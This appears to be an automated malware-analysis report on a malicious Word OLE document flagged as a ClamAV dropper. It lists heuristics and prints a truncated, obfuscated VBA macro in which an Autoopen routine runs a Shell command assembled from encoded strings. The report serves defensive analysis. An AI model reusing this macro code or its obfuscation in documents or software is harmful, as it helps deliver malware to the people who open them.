Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The sample is a malicious OLE document containing a legacy WordBasic Autoopen macro, as indicated by multiple heuristics and the ClamAV detection name. The macro is likely intended to download and execute a second-stage payload, although the specific actions are obfuscated. The large slack space in the OLE structure is also a common characteristic of packed or obfuscated malicious documents.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6542819-0 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6542819-0
- OLE document has large unaccounted-for region (high; OLE_SLACK_ANOMALY): OLE file is 129,536 bytes but its declared streams total only 35,284 bytes; 94,252 bytes (73%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium; OLE_VBA_MACROS; 1 related finding): Document contains VBA macro code
- AutoOpen macro (high; OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31982 bytes |

SHA-256 of macros.bas: d0297d721623135f969815430ad0f4bbb2754afc4d7486039ef6d644e923a37b
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ujDjvvQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub jpiWVs(tssPw)
twzSX = 89948 * CByte(bcDtOn)
wvGHf = Int(92496) - Oct(30921 - 82308 * TYNLPB)
YCFNn = 98570 * CByte(NSkFX)
End Sub
Sub moIif(zlkkA)
CSduJj = 40580 * CByte(airIZY)
Wtpurs = Int(69110) - Oct(85177 - 59458 * ffuDQ)
RFXlhv = 35999 * CByte(AjzjH)
zIHYas = 90646 * CByte(JzSZwi)
EaWKqZ = Int(7137) - Oct(4275 - 75677 * bajuH)
DkhQWX = 42676 * CByte(YtcvaS)
woivJ = 50997 * CByte(RYvGU)
zROvC = Int(4280) - Oct(29548 - 79080 * OIhEt)
wzHcVI = 58631 * CByte(CwzUjT)
End Sub
Sub UQDNd(ijtXC)
faWOE = 63179 * CByte(Uboizz)
iMzEh = Int(66465) - Oct(42244 - 15837 * rdqQfR)
NESqw = 24166 * CByte(jtnwwi)
mEOIcS = 68588 * CByte(qUwXji)
NQFDKa = Int(49868) - Oct(63584 - 18316 * RfNKt)
XaMFZc = 14049 * CByte(zjXNz)
End Sub
Sub Autoopen()
On Error Resume Next
bfBwfX = 82635 * CByte(XGMXEm)
mVfwi = Int(47288) - Oct(94569 - 38523 * LlJCD)
CMjPum = 57434 * CByte(iWvcC)
TiOoQjQV (tCXUs + nFODYizhYv + KsQPV)
LdmuNo = 83371 * CByte(DznpsX)
GAamw = Int(89143) - Oct(25867 - 59843 * NoJrT)
vTuQa = 1176 * CByte(kIGlJC)
End Sub
Sub OicUDE(qcZjww)
hYfzau = 8937 * CByte(vbzIi)
SjLlK = Int(72224) - Oct(89795 - 58644 * ooORF)
UjcCzD = 69137 * CByte(liIoun)
XuacY = 93628 * CByte(wnMiC)
rKLdz = Int(56051) - Oct(50226 - 91202 * GiMiF)
CCwAq = 22727 * CByte(uoohu)
hopQA = 45545 * CByte(aWfpRN)
CovPq = Int(83574) - Oct(77562 - 92899 * PiMAaQ)
oSiTN = 62233 * CByte(OMKVz)
End Sub
Sub WHidGO(tYrCS)
DZhoXI = 18955 * CByte(qXiur)
YjDfV = Int(79269) - Oct(32261 - 27959 * zitML)
QbjAcc = 81113 * CByte(YnMpfj)
End Sub
Attribute VB_Name = "DnaCdFskcp"
Sub bMwaSDZjUqjhz()
On Error Resume Next
XTqLW = 25401 * CByte(fMbjjc)
bBjdzP = Int(97753) - Oct(43711 - 59168 * QTCzi)
UGdBFm = 3700 * CByte(FcKwA)
End Sub
Sub TiOoQjQV(qFkOSjfj As String)
On Error Resume Next
tlbwI = 36751 * CByte(FhhBB)
ovCKiB = Int(60277) - Oct(12393 - 51178 * aXpzJ)
WFCWJ = 16937 * CByte(sFrLZP)
vAEwN = 58418 * CByte(RjvUO)
iBZTT = Int(94623) - Oct(65040 - 21448 * wiffRK)
nqFrC = 14481 * CByte(TslfU)
[Shell] ZHBuq + Chr(vbKeyC) + qFkOSjfj + qjXrchNTBZRhNs + sEPXQbb, ciXcjw + 0 + ciXcjw
biRMG = 5531 * CByte(dlpVTY)
zcKoo = Int(45915) - Oct(87361 - 52283 * ScrjC)
WZTPaw = 17451 * CByte(UGQKw)
End Sub
Function zASGqGjRfHpou()
On Error Resume Next
ZSZmi = 40074 * CByte(QwvZm)
mBvzKi = Int(73865) - Oct(9146 - 26514 * lCZSY)
cRCNhX = 37346 * CByte(qYznLm)
wzojrjlq = OUtvU("U.E%!=%WnBWkLSCrkzUic%Ewj", 63981 - 63981 + 4 + 63981 - 63981, 63981 - 63981 + 19 + 63981 - 63981)
nblVbS = 62382 * CByte(TDOLDo)
JCndVd = Int(44405) - Oct(48298 - 16732 * iMGli)
tbjzan = 95003 * CByte(TwniJS)
lKNmz = 5464 * CByte(qKtaXM)
dspoU = Int(42104) - Oct(10273 - 71852 * oiXzZ)
zmEJvK = 67825 * CByte(WZnSlc)
imUVPz = OUtvU("S5% tc@IAX0", 23556 - 23556 + 7 + 23556 - 23556, 23556 - 23556 + 3 + 23556 - 23556)
cCcUsH = 30264 * CByte(DQDAl)
IaFUt = Int(22104) - Oct(13415 - 42544 * RutNT)
jDUJf = 23413 * CByte(vchqjQ)
LGvuZE = 12242 * CByte(jrlRTD)
Xvsvm = Int(7663) - Oct(96100 - 40404 * wOfIu)
FbATj = 76119 * CByte(ZjFjzO)
dTpwzIOh = OUtvU("zu6jLoz", 1553 - 1553 + 2 + 1553 - 1553, 1553 - 1553 + 1 + 1553 - 1553)
kUVzbU = 92240 * CByte(KVuNlf)
LZzuOl = Int(19483) - Oct(31765 - 99342 * YlVLq)
Ejbfd = 85650 * CByte(haWYRf)
wqvuwq = 74139
```

... (truncated)